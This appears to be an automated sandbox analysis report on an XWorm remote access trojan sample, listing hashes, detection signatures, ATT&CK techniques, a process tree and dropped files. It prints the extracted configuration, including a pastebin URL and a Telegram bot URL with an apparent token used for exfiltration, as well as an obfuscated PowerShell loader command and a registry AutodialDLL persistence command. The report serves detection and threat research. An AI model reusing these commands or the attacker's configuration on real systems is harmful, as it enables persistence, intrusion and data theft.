xworm | 71356b2228b9e2da8b805cdda714c160b0d8e410beea629ba32af7f341718295

Analysis

max time kernel
151s
max time network
19s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
01/03/2025, 19:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Loader.exe
Size

4.6MB
MD5

33f2f30de4bea3826730bfaa1a01186d
SHA1

7ec891eb7eb4ad408c46bdb4ec05860480dd3178
SHA256

71356b2228b9e2da8b805cdda714c160b0d8e410beea629ba32af7f341718295
SHA512

743a611038bcb259f5f7fc5cf3751fa5f9243d0c4e58d678849a57c29a31e2ea3733f08e0b1973e35cdd14093eb87524f94516d1be8ff0cfc8d6b40310339fa9
SSDEEP

98304:cFVR1FwhUEYVa02weZZuISA12HsTYtXztHfBu3fOv:0VRQhfYVHUZuVp9zZBuW

Score

10^/10

xworm defense_evasion discovery execution rat themida trojan

Malware Config

Extracted

Family

xworm

Attributes

Install_directory
%AppData%
install_file
x69XClient.exe
pastebin_url
https://pastebin.com/raw/7KHrn9yR
telegram
https://api.telegram.org/bot7600824685:AAHOEzTxziP7s4Wf095smbzn6FrkvRgCwVk/sendMessage?chat_id=7600824685

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0008000000016cf0-55.dat	family_xworm
behavioral1/memory/2256-61-0x0000000000B80000-0x0000000000B96000-memory.dmp	family_xworm

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection	svchost.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2996 created 416	2996	powershell.EXE	5

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Loader.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	x69M5tLLoveYOU.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Loader.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Loader.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	x69M5tLLoveYOU.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	x69M5tLLoveYOU.exe

Executes dropped EXE 3 IoCs

pid	Process
2808	x69M5tLLoveYOU.exe
2668	Install.exe
2256	x69s.exe

Loads dropped DLL 3 IoCs

pid	Process
1104	Loader.exe
2808	x69M5tLLoveYOU.exe
2808	x69M5tLLoveYOU.exe

Themida packer 5 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/memory/1104-24-0x0000000000400000-0x0000000000C98000-memory.dmp	themida
behavioral1/files/0x0009000000016ace-30.dat	themida
behavioral1/memory/1104-42-0x0000000000400000-0x0000000000C98000-memory.dmp	themida
behavioral1/memory/2808-46-0x0000000000400000-0x0000000000A4A000-memory.dmp	themida
behavioral1/memory/2808-60-0x0000000000400000-0x0000000000A4A000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 2 IoCs

defense_evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Loader.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	x69M5tLLoveYOU.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2996	powershell.EXE

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1104	Loader.exe
2808	x69M5tLLoveYOU.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2996 set thread context of 2968	2996	powershell.EXE	42

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Loader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	x69M5tLLoveYOU.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d0144c1bdd8adb01	powershell.EXE

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1104	Loader.exe
2808	x69M5tLLoveYOU.exe
2996	powershell.EXE
2996	powershell.EXE
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe
2968	dllhost.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2256	x69s.exe
Token: SeDebugPrivilege	2996	powershell.EXE
Token: SeDebugPrivilege	2996	powershell.EXE
Token: SeDebugPrivilege	2968	dllhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1104 wrote to memory of 2808	1104	Loader.exe	31
PID 1104 wrote to memory of 2808	1104	Loader.exe	31
PID 1104 wrote to memory of 2808	1104	Loader.exe	31
PID 1104 wrote to memory of 2808	1104	Loader.exe	31
PID 1104 wrote to memory of 2600	1104	Loader.exe	32
PID 1104 wrote to memory of 2600	1104	Loader.exe	32
PID 1104 wrote to memory of 2600	1104	Loader.exe	32
PID 1104 wrote to memory of 2600	1104	Loader.exe	32
PID 2600 wrote to memory of 2832	2600	cmd.exe	34
PID 2600 wrote to memory of 2832	2600	cmd.exe	34
PID 2600 wrote to memory of 2832	2600	cmd.exe	34
PID 2600 wrote to memory of 2832	2600	cmd.exe	34
PID 2832 wrote to memory of 2892	2832	net.exe	35
PID 2832 wrote to memory of 2892	2832	net.exe	35
PID 2832 wrote to memory of 2892	2832	net.exe	35
PID 2832 wrote to memory of 2892	2832	net.exe	35
PID 2600 wrote to memory of 2852	2600	cmd.exe	36
PID 2600 wrote to memory of 2852	2600	cmd.exe	36
PID 2600 wrote to memory of 2852	2600	cmd.exe	36
PID 2600 wrote to memory of 2852	2600	cmd.exe	36
PID 2808 wrote to memory of 2668	2808	x69M5tLLoveYOU.exe	37
PID 2808 wrote to memory of 2668	2808	x69M5tLLoveYOU.exe	37
PID 2808 wrote to memory of 2668	2808	x69M5tLLoveYOU.exe	37
PID 2808 wrote to memory of 2668	2808	x69M5tLLoveYOU.exe	37
PID 2808 wrote to memory of 2668	2808	x69M5tLLoveYOU.exe	37
PID 2808 wrote to memory of 2668	2808	x69M5tLLoveYOU.exe	37
PID 2808 wrote to memory of 2668	2808	x69M5tLLoveYOU.exe	37
PID 2808 wrote to memory of 2256	2808	x69M5tLLoveYOU.exe	38
PID 2808 wrote to memory of 2256	2808	x69M5tLLoveYOU.exe	38
PID 2808 wrote to memory of 2256	2808	x69M5tLLoveYOU.exe	38
PID 2808 wrote to memory of 2256	2808	x69M5tLLoveYOU.exe	38
PID 2944 wrote to memory of 2996	2944	taskeng.exe	40
PID 2944 wrote to memory of 2996	2944	taskeng.exe	40
PID 2944 wrote to memory of 2996	2944	taskeng.exe	40
PID 2996 wrote to memory of 2968	2996	powershell.EXE	42
PID 2996 wrote to memory of 2968	2996	powershell.EXE	42
PID 2996 wrote to memory of 2968	2996	powershell.EXE	42
PID 2996 wrote to memory of 2968	2996	powershell.EXE	42
PID 2996 wrote to memory of 2968	2996	powershell.EXE	42
PID 2996 wrote to memory of 2968	2996	powershell.EXE	42
PID 2996 wrote to memory of 2968	2996	powershell.EXE	42
PID 2996 wrote to memory of 2968	2996	powershell.EXE	42
PID 2996 wrote to memory of 2968	2996	powershell.EXE	42
PID 2968 wrote to memory of 416	2968	dllhost.exe	5
PID 2968 wrote to memory of 464	2968	dllhost.exe	6
PID 2968 wrote to memory of 472	2968	dllhost.exe	7
PID 2968 wrote to memory of 480	2968	dllhost.exe	8
PID 2968 wrote to memory of 592	2968	dllhost.exe	9
PID 2968 wrote to memory of 672	2968	dllhost.exe	10
PID 2968 wrote to memory of 756	2968	dllhost.exe	11
PID 2968 wrote to memory of 816	2968	dllhost.exe	12
PID 2968 wrote to memory of 860	2968	dllhost.exe	13
PID 2968 wrote to memory of 1000	2968	dllhost.exe	15
PID 2968 wrote to memory of 340	2968	dllhost.exe	16
PID 2968 wrote to memory of 364	2968	dllhost.exe	17
PID 2968 wrote to memory of 1044	2968	dllhost.exe	18
PID 2968 wrote to memory of 1204	2968	dllhost.exe	19
PID 2968 wrote to memory of 1312	2968	dllhost.exe	20
PID 2968 wrote to memory of 1368	2968	dllhost.exe	21
PID 2968 wrote to memory of 620	2968	dllhost.exe	23
PID 2968 wrote to memory of 1580	2968	dllhost.exe	24
PID 2968 wrote to memory of 1096	2968	dllhost.exe	25
PID 2968 wrote to memory of 308	2968	dllhost.exe	26
PID 2968 wrote to memory of 2156	2968	dllhost.exe	27

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:416
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{7ac670ba-2923-432f-9214-240a899a61de}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2968

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:464
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:592
- - C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    3⤵
    PID:620
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe
    3⤵
    PID:1096
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:672
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  - Modifies security service
  PID:756
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:816
- - C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    3⤵
    PID:1312
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  PID:860
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {1685162D-6221-4993-84C6-7C3F24D54EE0} S-1-5-18:NT AUTHORITY\System:Service:
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2944
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+[Char](70)+''+'T'+''+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](120)+''+'6'+'9'+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2996
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:1000
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:340
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:364
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:1044
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1204
- C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
  "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
  2⤵
  PID:1580
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:308
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:2156

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:472

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:480

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1368
- C:\Users\Admin\AppData\Local\Temp\Loader.exe
  "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1104
- - C:\Users\Admin\AppData\Local\Temp\x69M5tLLoveYOU.exe
    "C:\Users\Admin\AppData\Local\Temp\x69M5tLLoveYOU.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2808
  - - C:\Users\Admin\AppData\Local\Temp\Install.exe
      "C:\Users\Admin\AppData\Local\Temp\Install.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2668
  - - C:\Users\Admin\AppData\Local\Temp\x69s.exe
      "C:\Users\Admin\AppData\Local\Temp\x69s.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2256
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\Load.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2600
  - - C:\Windows\SysWOW64\net.exe
      net session
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2832
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2892
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\SYSTEM\ControlSet001\Services\WinSock2\Parameters" /t REG_SZ /v AutodialDLL /d "C:\Windows\diddy.dll" /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:2852

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1503700025-1173153391-9068176051706856829-326190970-1865813883-22894880-496693270"
1⤵
PID:2436

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Load.bat

Filesize
471B

MD5
7bb716e30729a28e99fa5a05f9e4836b

SHA1
44b56c234fffa3f1acdf067b16a39ebc52062844

SHA256
937c3d512280a3ce21d022410f9c4f1217821d64f4ce754755029747ed76e68c

SHA512
d1004796650331729eb92fdcff97f331cc87d014b8bd2fd634e869ecc5ca2a3630770e8d6fb90e9ce3302a2ee7d814dbf8ea649928d6bc7d1971808949bbf87c

Download Submit
C:\Users\Admin\AppData\Local\Temp\x69M5tLLoveYOU.exe

Filesize
2.3MB

MD5
d2d0f9a333b3a012ecd8a870fe1acb66

SHA1
dd91a5b0950bdd462c8b7423714b484fdc751529

SHA256
440c002f4b02f1e2bacafaaca07e57c53bf65b949a284bae677e9916bb1502f0

SHA512
405c3a7f9141af974f5c5308173590b29a7ff57520afeaed9311846d1f5bdd41ea88d239f9f02b9a2c8b3e9f512840927509b4e330cf263cd448d59b071dab0b

Download Submit
\Users\Admin\AppData\Local\Temp\Install.exe

Filesize
164KB

MD5
a6807422fd83a9382cc5f68f89e94320

SHA1
07cf4f4a5c2d3c869e9cc0df44d7899319feefac

SHA256
e57cbfc23aaab3ed48007438f9b6fc34aa42ec1c8c73329a2f98ec61fb81c53f

SHA512
efeec122de9dc32c69dc03576aad8c7d11ab5f35f7869bd25af525d6daf2446fbb55902c9160220f79fcb8908fcc3a1778246fa63a53b2e9e15af061a3b0b36c

Download Submit
\Users\Admin\AppData\Local\Temp\x69s.exe

Filesize
61KB

MD5
be3c3be84ff9045490a0e4c113a63e92

SHA1
489b4016e9dcc129c8411e6fb4b5f2008b2c3e33

SHA256
13681d4793560ff1f074271f8467eba1beb694a638f366abca7d264c6e64b323

SHA512
261037f800f863fdd81a209a47f6dd2370a06ed4bd0be895daba03837a13f8c74a4270f89da30e98f1f09a18d5d54120d83d0596ac9ddb0cf83bb41130e08141

Download Submit
memory/416-80-0x0000000000730000-0x0000000000756000-memory.dmp

Filesize
152KB

Download
memory/416-88-0x0000000000760000-0x000000000078C000-memory.dmp

Filesize
176KB

Download
memory/416-78-0x0000000000730000-0x0000000000756000-memory.dmp

Filesize
152KB

Download
memory/416-82-0x0000000000760000-0x000000000078C000-memory.dmp

Filesize
176KB

Download
memory/416-81-0x0000000000760000-0x000000000078C000-memory.dmp

Filesize
176KB

Download
memory/416-90-0x00000000372C0000-0x00000000372D0000-memory.dmp

Filesize
64KB

Download
memory/416-89-0x000007FEBECC0000-0x000007FEBECD0000-memory.dmp

Filesize
64KB

Download
memory/464-114-0x0000000000080000-0x00000000000AC000-memory.dmp

Filesize
176KB

Download
memory/464-120-0x0000000000080000-0x00000000000AC000-memory.dmp

Filesize
176KB

Download
memory/464-121-0x000007FEBECC0000-0x000007FEBECD0000-memory.dmp

Filesize
64KB

Download
memory/464-122-0x00000000372C0000-0x00000000372D0000-memory.dmp

Filesize
64KB

Download
memory/472-100-0x0000000000150000-0x000000000017C000-memory.dmp

Filesize
176KB

Download
memory/472-106-0x0000000000150000-0x000000000017C000-memory.dmp

Filesize
176KB

Download
memory/472-108-0x00000000372C0000-0x00000000372D0000-memory.dmp

Filesize
64KB

Download
memory/472-107-0x000007FEBECC0000-0x000007FEBECD0000-memory.dmp

Filesize
64KB

Download
memory/480-128-0x00000000003D0000-0x00000000003FC000-memory.dmp

Filesize
176KB

Download
memory/1104-6-0x0000000076F50000-0x0000000077060000-memory.dmp

Filesize
1.1MB

Download
memory/1104-19-0x0000000076F50000-0x0000000077060000-memory.dmp

Filesize
1.1MB

Download
memory/1104-22-0x0000000076F50000-0x0000000077060000-memory.dmp

Filesize
1.1MB

Download
memory/1104-20-0x0000000076F50000-0x0000000077060000-memory.dmp

Filesize
1.1MB

Download
memory/1104-2-0x0000000076F50000-0x0000000077060000-memory.dmp

Filesize
1.1MB

Download
memory/1104-39-0x0000000005C10000-0x000000000625A000-memory.dmp

Filesize
6.3MB

Download
memory/1104-42-0x0000000000400000-0x0000000000C98000-memory.dmp

Filesize
8.6MB

Download
memory/1104-43-0x0000000076F50000-0x0000000077060000-memory.dmp

Filesize
1.1MB

Download
memory/1104-21-0x0000000076F50000-0x0000000077060000-memory.dmp

Filesize
1.1MB

Download
memory/1104-3-0x0000000076F50000-0x0000000077060000-memory.dmp

Filesize
1.1MB

Download
memory/1104-1-0x0000000076F64000-0x0000000076F65000-memory.dmp

Filesize
4KB

Download
memory/1104-4-0x0000000076F50000-0x0000000077060000-memory.dmp

Filesize
1.1MB

Download
memory/1104-23-0x0000000076F50000-0x0000000077060000-memory.dmp

Filesize
1.1MB

Download
memory/1104-7-0x0000000076F50000-0x0000000077060000-memory.dmp

Filesize
1.1MB

Download
memory/1104-24-0x0000000000400000-0x0000000000C98000-memory.dmp

Filesize
8.6MB

Download
memory/1104-18-0x0000000076F50000-0x0000000077060000-memory.dmp

Filesize
1.1MB

Download
memory/1104-15-0x0000000076F50000-0x0000000077060000-memory.dmp

Filesize
1.1MB

Download
memory/1104-14-0x0000000076F50000-0x0000000077060000-memory.dmp

Filesize
1.1MB

Download
memory/1104-13-0x0000000076F50000-0x0000000077060000-memory.dmp

Filesize
1.1MB

Download
memory/1104-12-0x0000000076F50000-0x0000000077060000-memory.dmp

Filesize
1.1MB

Download
memory/1104-11-0x0000000076F50000-0x0000000077060000-memory.dmp

Filesize
1.1MB

Download
memory/1104-10-0x0000000076F50000-0x0000000077060000-memory.dmp

Filesize
1.1MB

Download
memory/1104-9-0x0000000076F50000-0x0000000077060000-memory.dmp

Filesize
1.1MB

Download
memory/1104-8-0x0000000076F50000-0x0000000077060000-memory.dmp

Filesize
1.1MB

Download
memory/1104-5-0x0000000076F50000-0x0000000077060000-memory.dmp

Filesize
1.1MB

Download
memory/1104-0-0x0000000000400000-0x0000000000C98000-memory.dmp

Filesize
8.6MB

Download
memory/2256-61-0x0000000000B80000-0x0000000000B96000-memory.dmp

Filesize
88KB

Download
memory/2808-60-0x0000000000400000-0x0000000000A4A000-memory.dmp

Filesize
6.3MB

Download
memory/2808-46-0x0000000000400000-0x0000000000A4A000-memory.dmp

Filesize
6.3MB

Download
memory/2968-72-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2968-67-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2968-68-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2968-69-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2968-70-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2968-73-0x0000000077280000-0x0000000077429000-memory.dmp

Filesize
1.7MB

Download
memory/2968-75-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2968-74-0x0000000077160000-0x000000007727F000-memory.dmp

Filesize
1.1MB

Download
memory/2996-65-0x0000000077280000-0x0000000077429000-memory.dmp

Filesize
1.7MB

Download
memory/2996-66-0x0000000077160000-0x000000007727F000-memory.dmp

Filesize
1.1MB

Download
memory/2996-64-0x0000000000FF0000-0x000000000101A000-memory.dmp

Filesize
168KB

Download
memory/2996-62-0x0000000019C80000-0x0000000019F62000-memory.dmp

Filesize
2.9MB

Download
memory/2996-63-0x0000000000970000-0x0000000000978000-memory.dmp

Filesize
32KB

Download